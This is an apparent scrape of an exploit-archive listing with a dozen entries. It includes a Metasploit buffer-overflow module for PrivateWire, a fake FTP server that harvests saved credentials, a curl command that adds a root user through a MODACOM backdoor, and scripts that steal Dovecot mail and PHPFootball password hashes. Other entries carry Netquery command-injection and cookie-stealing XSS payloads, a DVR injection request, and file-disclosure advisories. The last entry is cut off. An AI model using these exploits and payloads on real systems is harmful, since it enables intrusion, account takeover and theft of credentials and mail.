Michael Thumann/privatewire.pm.txt(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
|
## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## ## # From the author: # This file may only be distributed as part of the Metasploit Framework. # Any other use needs a written permission from the author. ## package Msf::Exploit::privatewire_gateway_win32; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'Private Wire Gateway Buffer Overflow (win32)', 'Version' => '$Rev$', 'Authors' => [ 'Michael Thumann <mthumann[at]ernw.de>', ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32' ], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'PATH' => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'], }, 'Payload' => { 'Space' => 8000, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b", 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 }, 'Description' => Pex::Text::Freeform(qq{ This exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility. . }), 'Refs' => [ ['BID', '18647'], ], 'DefaultTarget' => 4, 'Targets' => [ ['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL ['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL ['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL ['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL ['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL ['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL ['Debugging', 0x41414141], # Crash ], 'Keys' => ['privatewire'], 'DisclosureDate' => 'June 26 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $path = $self->GetVar('PATH'); my $path_offset = length($path)-8; my $target = $self->Targets->[$target_idx]; my $pattern = Pex::Text::AlphaNumText(8192); my $jmp = # add 25 to ecx and jmp "\x6a\x19". "\x58". "\x01\xc1". "\xff\xe1"; substr($pattern, 0, length($shellcode), $shellcode); substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1])); substr($pattern, 8160, length($jmp), $jmp); my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n"; $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1])); my $s = Msf::Socket::Tcp->new ( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), ); if ($s->IsError) { $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } $s->Send($request); $s->Close(); return; } 1; |
This Metasploit module exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility version 3.7.
ManicX/ftp-spoof.pl( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
|
# This is a simple tcp server that listens on port 21 # unless another is specified. # The possible uses of this are; # Ftp has no encryption for passwords and they are # sent in plain text under the right conditions. # Most ftp programs have a text file called <program-name>.ini # which will store the info like site-name, user-name, encrypted # password and account-name. Instead of trying to decrypt the # password for each different application (ws_ftp etc) # do this.
# Edit the <program-name>.ini # Wherever there is a site-name change it to 127.0.0.1 # Start your this perl scipt # Open your ftp program and click connect # Most of this coding was already in the /perl/eg/ folder # you can find the orginal version there .. print "===========================\n"; print " Manicx local FTP spoofer\n"; print " www.infowar.co.uk/manicx/\n"; print "===========================\n"; ($port) = @ARGV; $port = 21 unless $port; # Are port is 21 unless specified $AF_INET = 2; $SOCK_STREAM = 1; $sockaddr = 'S n a4 x8'; ($name, $aliases, $proto) = getprotobyname('tcp'); if ($port !~ /^\d+$/) { ($name, $aliases, $port) = getservbyport($port, 'tcp');} print "Port = $port\n"; $this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0"); select(NS); $| = 1; select(stdout); socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!"; bind(S,$this) || die "bind: $!"; listen(S,5) || die "connect: $!"; select(S); $| = 1; select(stdout); print "Listening for connection..\n"; ($addr = accept(NS,S)) || die $!; print "Accept ok\n"; ($af,$port,$inetaddr) = unpack($sockaddr,$addr); @inetaddr = unpack('C4',$inetaddr); print NS "220\n"; # We are ok for login (send username) $user = <NS>; print $user; print NS "331\n"; # user ok send password $pass = <NS>; print $pass; print NS "331\n"; # password ok send account $acco = <NS>; print $acco; print NS "200\n"; # account ok send what you want. $resp = <NS>; print $resp; print NS "451\n"; # bye bye baby |
ftp-spoof.pl v0.01 - Local FTP server spoofer: Many FTP clients these days have a text file called (program-name).ini which will store the info like site-name, user-name, encrypted password and account-name. Instead of trying to decrypt the password for each
different application (ws_ftp etc) do this: edit the (program-name).ini, wherever there is a site-name change it to 127.0.0.1, start this perl scipt, open your ftp program and click connect.
Alex Stanev/MODACOM URoad-5000 1450 Command Execution(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
|
================================================ == Alex Stanev Security Advisory #4 @31.05.2011 == == ================================================ PRODUCT URoad-5000 VENDOR MODACOM [http://www.modacom.co.kr] VERSIONS AFFECTED v1450 CLASS Remote command execution/Backdoor PRODUCT DESCRIPTION URoad-5000 is integrated battery powered wireless router. It comes with only one external USB interface and no other hardware comm interfaces (such as ethernet). Based on RaLink SoC 3050. The USB port is used for connection with MW-U3050, which is USB WiMAX dongle. Linux inside. Often marketed as WiMAX 2 WiFi "converter". THE PROBLEM The box uses modified version of RaLink SDK. The standard web interface is accessed via HTTP. 1) Web administration interface can be accessed with standard user/password pair admin:admin This can be later changed, but there is another possible access pair - engineer:engineer and it can't be changed via the web interface. 2) Some of the SDK standard scripts are left and their screens in the web interface are just HTML commented. This reveals the /goform/SystemCommand method. EXPLOIT 1) Remote add r00t user with password boza $curl --basic -u "engineer:engineer" \ -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" \ 192.168.100.254/goform/SystemCommand $telnet 192.168.100.254 Trying 192.168.100.254... Connected to 192.168.100.254. modacom login: r00t Password: boza BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash) Enter 'help' for a list of built-in commands. # ADDITIONAL INFO The flaw was presented on OpenFest 2010. Presentation: PATCH/WORKAROUND No workaround possible. Next version? VENDOR STATUS NOT informed. Backdoor. ========================= == EOF == == ========================= |
MODACOM URoad-5000 version 1450 has a hard-coded backdoor account that allows for remote command execution.
indoushka/Kasseler CMS 2.0.5 Disclosure(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
======================================================================================== | # Title : kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Dork : Copyright ©2007-2009 by Kasseler CMS. All rights reserved. | # Tested on: windows SP2 Français V.(Pnx2 2.0) | # Bug : Backup ====================== Exploit By indoushka ================================= # Exploit :
File size: 37.38 KB Tables processed: 39 Rows processed: 37 in lig 645:668 col 1 you found the login information INSERT INTO `kasseler_users` VALUES (-1, 'guest', 'Guest', '', '', 'default.png', '0000-00-00 00:00:00', 'default', 0, '', '', '', '', '', 5, '', '0', '', '0000-00-00 00:00:00', '', '', '0000-00-00', 0, '', '', '', '', '', '', 0, (1, 'admin', 'admin', 'admin@127.0.0.1', 'http://127.0.0.1/', 'admin.png', '2010-04-27 11:25:22', 'default', 2, NULL, NULL, NULL, NULL, 'd0970714757783e6cf17b26fb8e2298f', 3 - XSS : http://127.0.0.1/index.php?online/<script>alert(213771818860)</script> Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ==================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R www.sa-hacker.com * www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N ------------------------------------------------------------------------------------------------------------------------ |
Kasseler CMS 2.0.5 suffers from backup disclosure vulnerabilities.
Bogdan Calin/Zen Cart File Disclosure(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
|
Usually, curl is used to connect and retrieve data from a remote URL using the http protocol. However, curl supports a bunch of protocols. One of these protocols is the file protocol. Using this protocol you can read local files by using an URL like the user can control the URL passed to curl_exec, in some cases (if the content is echoed back) he can read local files. While testing our AcuSensor technology on different applications, I’ve found a real-life example of a vulnerable application. I’m talking about Zen Cart. Zen Cart is an open source online store management system. It is PHP-based, using a MySQL database and HTML components. Support is provided for several languages and currencies, and it is freely available under the GNU General Public License. Zen Cart contains a directory named extras where there are different test scripts. One of these scripts is curltest.php. This script is used for testing is the curl PHP library is installed and is working properly. Source code: ... $url = (isset($_GET['url'])) ? urldecode($_GET['url']) : $defaultURL; ... // Send CURL communication $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_VERBOSE, 0); ... $result = curl_exec($ch); $errtext = curl_error($ch); $errnum = curl_errno($ch); $commInfo = @curl_getinfo($ch); curl_close ($ch); ... if ($url != $defaultURL) echo $result . 'EOF'; ... As you can see above, the URL passed to the curl_setopt (CURLOPT_URL) function and later used by curl_exec comes from user input ($_GET['url']). Also, the file contents (saved in the $result) are echoed back to the user. Therefore we can read the contents of any file from the remote server by issuing an request like: The extras directory contains other test scripts. One of them, named ipn_test_return.php, is not properly written and will display an error message when called directly: If you issue a request like you will receive the following error message: <br /> <b>Fatal error</b>: require() [<a href='function.require'>function.require</a>]: Failed opening required ‘includes/application_top.php’ (include_path=’.:/usr/share/php:/usr/share/pear’) in <b>/var/www/bld/bld02/zen-cart/extras/ipn_test_return.php</b> on line <b>14</b><br /> This error message reveals the local path, so now we know where the application is installed. This could be useful to read the contents of the configuration file (includes/configure.php). This file contains the database credentials. If the Zen Cart database is not stored on the local server, it’s possible to access the database remotely. Also, even without the behind the firewall by issuing requests like The vendor released a security alert after being notified by us. They advise users to completely remove the extras directory as it’s not required by Zen Cart and it was distributed only for troubleshooting. The security alert can be found at: -- Bogdan Calin - bogdan@acunetix.com CTO Acunetix Ltd. -
Acunetix Web Security Blog - |
Zen Cart suffers from a remote file disclosure vulnerability.
Roberto Suggi Liverani/sugarcrm-disclose.txt(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
|
======================================================================== = SugarCRM Community Edition Local File Disclosure Vulnerability = = Vendor Website:
= = Affected Version: = -- SugarCRM Community Edition 4.5.1 = -- SugarCRM Community Edition 5.0.0 = = Public disclosure on 29th April 2008 = ======================================================================== Available online at: local_file_disclosure.pdf == Overview == SugarCRM Community Edition is vulnerable to local file contents disclosure. This vulnerability can be exploited by a malicious user to disclose potentially sensitive information. The flaw is caused due to a lack of input filtering in the SugarCRM RSS module, which can be exploited to disclose the content of local files. The RSS module allows SugarCRM users to add RSS feeds to their personal RSS list. The application expects an URL value pointing to a valid RSS feed. However, the URL variable value is not properly sanitised and any URI value can be entered instead. In this particular case, it was discovered that it is possible to enter a file path to any files on the local system hosting the SugarCRM application. As a result SugarCRM does not display the new RSS feed in the list as it is not a valid RSS URL Feed. However, the application creates a local file with the filename of the md5 hash of the URL entered. The file is created in the directory cache/feeds . If the Apache web server is used, the file is created with the user www-data containing read permission. == Exploitation == An exploitation example in a LAMP (Linux, Apache, Mysql, PHP) environment: If an authenticated attacker enters a value of /etc/passwd (without quotes) in the RSS URL field, the application will generate a MD5 hash of the string containing the file path. In this case, the value /etc/passwd is hashed to c5068b7c2b1707f8939b283a2758a691 (without quotes). The MD5 hash is then used as a filename with the file contents of /etc/passwd. The file /etc/passwd can then be viewable 83a2758a691 . Exploitation of this flaw does not require authentication. The URL variable is handled by the /modules/Feeds/Feed.php page. The array variable $url is passed without filtering to the xml_domit_rss_document function at the following line: $rssdoc = new xml_domit_rss_document ($this->url, cache/feeds/, 3600); The XML domit RSS plugin is then called and retrieves the file content at the path given and then generate the MD5 hashed file in the cache/feeds folder as instructed by the function in Feed.php . == Solutions == Install the vendor supplied patches. Patch 4.5.1j:
Patch 5.0.0c:
== Credit == Discovered and advised to SugarCRM April 2008 by Roberto Suggi Liverani Craig of Security-Assessment.com == Greetings == To all my SA colleagues and thanks to the great atmosphere in Hack in the Bush! It was inspirational... == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. Roberto Suggi Liverani Security-Assessment.com |
SugarCRM Community Edition versions 4.5.1 and 5.0.0 suffer from a local file disclosure vulnerability.
Luigi Auriemma/wsftp-disclose.txt(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
|
####################################################################### Luigi Auriemma Application: WS_FTP Server Manager Versions: WS_FTP Server <= 6.1.0.0 Platforms: Windows Bugs: A] authorization bypassing in log visualization B] ASP source visualization Exploitation: remote Date: 06 Feb 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== WS_FTP Server Manager (aka WS_FTP WebService) is the web administration interface of the IpSwitch WS_FTP server and runs by default on port 80. ####################################################################### ======= 2) Bugs ======= ----------------------------------------------- A] authorization bypassing in log visualization ----------------------------------------------- The FTPLogServer folder available in the WS_FTP WebService is used for the visualization and the downloading of the log entries collected by the Logger Server used for any logging operation of the IpSwitch servers (like both WS_FTP and the same WebService). Naturally for watching the logs is needed to know the administration username and password but exists a vulnerability which allows anyone to gain access to this function of the server. It's enough to logout from the web server without being logged in and after this operation is possible to use all the asp files located in the FTPLogServer folder through a strange account name called localhostnull. The vulnerability has been confirmed from both LAN and Internet. The authorization bypassing is possible only for the ASP files located in this folder so the management of the FTP server is not touched by the vulnerability. --------------------------- B] ASP source visualization --------------------------- The following small bug is reported here only for thoroughness and has no impact. By default it canNOT be defined a vulnerability because the webservice, although possible due to its directories structure (in short the WS_FTP stuff is all in the WSFTPSVR folder so the rest of the root path of the web server can be used for anything else), can't be considered a "classical" web server where using custom contents. Anyway if on the web server are in use custom ASP files a person can see their content simply adding a dot at the end of the URL like in the following examples of some pre-existent script files without the need of being logged in: ####################################################################### =========== 3) The Code =========== The following are the URLs to use in sequence for watching the logs: ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma |
WS_FTP Server versions 6.1.0.0 and below and Ipswitch What's Up Gold version 11.03 suffer from source disclosure and authorization bypass vulnerabilities.
Kingcope/MDaemon Mailer Daemon 11.0.1 File Disclosure(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
|
MDaemon Mailer Daemon Version 11.0.1 (LATEST) Remote File Disclosure Bug Found & Exploited by Kingcope May 2010 The latest version at the time of this advisory is vulnerble to the attack. It seems all files which the SYSTEM account can read can be accessed remotely, even accessing files on SMB shares located in the local network might be possible. The caveat is that only human readable files can be read. This bug is complex so let's break the attack down into it's different pieces. Mailing list support in MDaemon --- MDaemon support mailing list. When a mailing list is configured, people can subscribe and use the mailing list commands which are sent to MDaemon@<domainhere>. The MDaemon Software stores configurations for mailing lists inside a file with the grp extension which is located in <MDaemonDir>(normally C:\MDaemon)\App so for example in C:\MDaemon\App. A mailing list group file can look like the following (only a snippet of the file): ---snip--- # Mailing List file # ; ListName = test@company.mail ; Private = N ; HideFromAddressBook = N ; AllowExpn = Y ; ListNameInSubject = Y ... ---snip--- grp file -- Inside the grp file there is a setting for a welcome message which is sent when a user subscribes to a mailing list. The field is named "WelcomeFile", for example this setting can be: ; WelcomeFile = C:\autoexec.bat Directory traversal in SUBSCRIBE (and other commands, SUBSCRIBE is the important for the attack) -- When subscribing to a mailing list the user sends an E-Mail with a subject like: SUBSCRIBE test-mailinglist@<domainhere> In this case a grp file named test-mailinglist@domain.grp will be searched for in C:\MDaemon\App\. An attacker can now supply dot dot slashes here to point to a different file as intended, for example: SUBSCRIBE VVV@"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar In this case the Mailer Daemon will look for the grp file in the location C:\Users\Kcope\OpenShare\foobar.grp. If the file exists MDaemon will use this file and send back a confirmation E-Mail because of a mailing list subscription. The attack does not depend on a mailing list being configured but on a file which the user controls under a C: folder (which he for example uploaded through SMB or FTP). So this is the only migitation for the attack. I did not find a way to discard the grp file extension added to the requested file, so it's not possible to reuse sent mails by the attacker for example. Welcome message file and final attack -- As seen before the grp file supports a welcome message file setting. When the user responds to the malicious subscription request sent by him (it's important to change the domain name at this point to the correct one, because MDaemon gets confused by the ../ domainname seen above when sending the confirmation mail) he will gracefully receive the requested file which was set in grp file back as an email contained in a welcome E-Mail by MDaemon. Exploit PoC -- The following exploit will force the welcome file set in c:/users/kcope/openshare/foobar.grp to be sent to the attacker after confirming the subscription request. ---snip--- use IO::Socket::INET; use MIME::Base64; $|=1; $sock = IO::Socket::INET->new(PeerAddr => 'localhost', PeerPort => '25', Proto => 'tcp'); print $sock "EHLO you\r\n"; print $sock "MAIL FROM: <niko>\r\n"; print $sock "RCPT TO: <MDaemon\@company.mail>\r\n"; print $sock "DATA\r\n"; print $sock "Date: 23 Oct 81 11:22:33\r\n"; print $sock "From: <niko>\r\n"; print $sock "To: <MDaemon\@company.mail>\r\n"; print $sock "Subject: SUBSCRIBE VVV\@\"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar\r\n"; print $sock "\r\n\r\ntest\r\n.\r\nQUIT\r\n"; print "."; while(<$sock>) { print; } ---snip--- Regards and Signed, Kingcope |
MDaemon Mailer Daemon version 11.0.1 suffers from a remote file disclosure vulnerability.
Andrea Fabrizi/Visual Tools DVR Command Injection / Password Disclosure(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
|
************************************************************** Title: Visual Tools DVR multiple vulnerabilities Version affected: VS Series <= 3.0.6.16, VX Series <= 4.2.19.2 Vendor:
Discovered By: Andrea Fabrizi Email: andrea.fabrizi@gmail.com Status: unpatched ************************************************************** Visual Tools develops, manufactures and commercializes video surveillance and video observations systems under the global brand name VideoSafe Technology or under other companies brand names. The DVR systems are based on x86 Debian GNU Linux embedded (aka emdebian) and the entire framework and software are written using Python. After a full reverse engineering of the firmware i discovered some interesting vulnerabilities, that allow an unauthorized user to access the DVR web interface and gain a root shell on the system. At the time i write this advisory, all DVR products commercialized by Visual Tools, based on this firmware, are vulnerable. 1]======== Administration password disclosure ======== The system expose an hidden cgi that disclose the Operator/Supervisor/Administrator password if invoked during the first ten minutes after system boot. Is possible to write a simple script that check the cgi, every five minutes for example, waiting for the device reboot, that sooner or later, will happen 2]======== Default Administration password ======== As the previous vulnerability, also in this case is possible to access any DVR system, during the first ten minutes after system boot, using an hard-coded password. The default password is: elefante (valid for Operator/Supervisor/Administrator account) 3]======== Log files disclosure ======== The system expose an hidden cgi that allow any unauthenticated user to get the system log files. By default the script does not works, because the zip file is generated into the cgi-bin directory. But... taking advantage of a directory traversal vulnerability that affect the same script, is possible to write the zip file into the apache root directory, and download it directly via browser. - Moreover, the file "service.log" contains the Session ID of the authenticated user, that can be used to hijack an existing session. 4]======== recv_ip_filtering.py command injection ======== Is possible, for authenticated users, to exploit a command injection vulnerability that affects the script /cgi-bin/conf/recv_ip_filtering.py. This script, used to add or remove ip addresses from the local iptables, accept one parameter that contains a list of IPs separated by space, so is not possible to execute directly a command that contains a space char. A workaround can be done passing the command through an http header (user-agent for example), and invoking the corresponding environment variable. This is a sample request: ##################################### POST User-Agent: [COMMAND] Cookie: language=en; session=VALID_SESSION_ID; user=administrator; current_page=main/400_Mconf/200_Mnetwork Content-Type: application/x-www-form-urlencoded Content-Length: 90 iplistFields=192.168.0.1+192.168.0.2%3b$HTTP_USER_AGENT%3b ##################################### The command will be executed with the privilege of the apache user. 5]======== init_diskmgr insecure permissions ======== The script "/home/apache/DiskManager/cron/init_diskmgr", writable by the apache user, is executed by crontab every 15 minutes, with root privileges. So, editing the script and waiting the scheduled execution, is possible to run command on the system with root privileges. By default the ssh access is denied because the /etc/shadow don't contains the root password shadow, but exploiting this vulnerability is possible to add it and gain ssh access to the system. ************************************************************** TIME-LINE - 21/09/2012: Vendor contact. No response. - 15/10/2012: Disclosure. ************************************************************** |
Visual Tools DVR VS Series versions 3.0.6.16 and below and VX Series versions 4.2.19.2 and below suffer from administrative password disclosure, default administrative password, log file disclosure, command injection, and insecure permission vulnerabilities.
Kingcope/dovecot-disclose.txt( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit #Here's an exploit for the recent TAB vulnerability in Dovecot. #It's nothing special since in the wild there are few to none #targets because of the special option which has to be set. #see CVE Entry CVE-2008-1218 #Exploit written by Kingcope import sys import imaplib print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit" print "Prints out all E-Mails for any account if special configuration option is set" print "Exploit written by kingcope\n" if len(sys.argv)<3: print "usage: %s <hostname/ip address> <account> [-nossl]" % sys.argv[0] exit(0); if len(sys.argv)>3 and sys.argv[3] == "-nossl": M = imaplib.IMAP4(sys.argv[1]) else: M = imaplib.IMAP4_SSL(sys.argv[1]) M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\""); M.select() print "login succeeded." typ, data = M.search(None, 'ALL') k=0 for num in data[0].split(): typ, data = M.fetch(num, '(RFC822)') print 'Message %s\n%s\n' % (num, data[0][1]) k=k+1 M.close() M.logout() print "Messages read: %s" % k |
Dovecot IMAP versions 1.0.10 through 1.1rc2 remote email disclosure exploit.
KinG-LioN/PHPFootball 1.6 Hash Disclosure(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
<?php $host = $argv[1]; $path = $argv[2]; if ($argc != 3) { echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n"; echo "by KinG-LioN - echo "Usage: php {$argv[0]} <host> <path>\n"; exit; } else { $head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n"; $head .= "Host: {$host}\r\n"; $head .= "Connection: close\r\n\r\n"; $fsock = fsockopen ($host,80); fputs ($fsock,$head); while (!feof($fsock)) { $cont .= fgets($fsock); } fclose($fsock); if (preg_match_all("/<td class=td>(.+?)<\/td>/",$cont,$i)) { print_r($i[1]); } else { die ("exploit error\n"); } } ?> |
Exploit for PHPFootball versions 1.6 and below which suffer from a remote hash disclosure vulnerability in filter.php.
rgod/netquery31.txt( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit software: author site:
a user can execute commands on target system by PING panel, if enabled like often happens, using pipe char on "Ping IP Address or Host Name" input text box, example: | cat /etc/passwd then you will see plain text password file | pwd to see current path | rm [pwd_output]/logs/nq_log.txt to delete log file... disclosure of user activity: if enabled, a user can view clear text log file through url: http://[target]/[path]/logs/nq_log.txt xss: http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script> http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script> http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script> http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script> http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script> http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script> http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script> http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script> a user can use on-line Netquery installations like proxy servers to launch exploit from HTTP GET request panel, example: exploiting Phpbb 2.0.15: make a get request of http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd googledork: inurl:nquser.php rgod email: rgod[at]autistici.org |
netquery 3.1 allows for remote command execution, cross site scripting, and information disclosure attacks. Detailed exploitation provided.
/webevent.txt( na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
To whom it may concern, I found what seems to be a bug in a program called webevent (www.webevent.com). Webevent is a calander program that allows multiple users to post to, and read the calander. The bug comes in from the fact that you still have access to the perl file that is run when the administrator runs the program for the first time. Once you run this perl file, it asks you to enter in the admin info, e.g name, email, and....password. I've tested version we3.3.3, i found this version running at www.eosmith.org (you can access firsttime at www.eosmith.org/scripts/we3.3.3/webevent.pl?cmd=firsttime (this is used to change the admin info and pass) and www.eosmith.org/scripts/we3.3.3/webevent.pl?cmd=login to login. Perhaps earlier versions have the same problem. One way around this is to simply delete the firsttime.pl file after you configure webevent. I also wonder if this is a problem with whether you are using the .cgi extension or .pl extension....also, since you have access to write events once you get admin, i am looking into how you write to the server when you create and submitevents. _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at Share information about yourself, create your own public profile at |
Webevent v3.3.3 (webevent.pl) is an online calendar which contains a remote cgi vulnerability which allows administrative access.
James Gray/fishyshoop-vuln.txt(
na)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
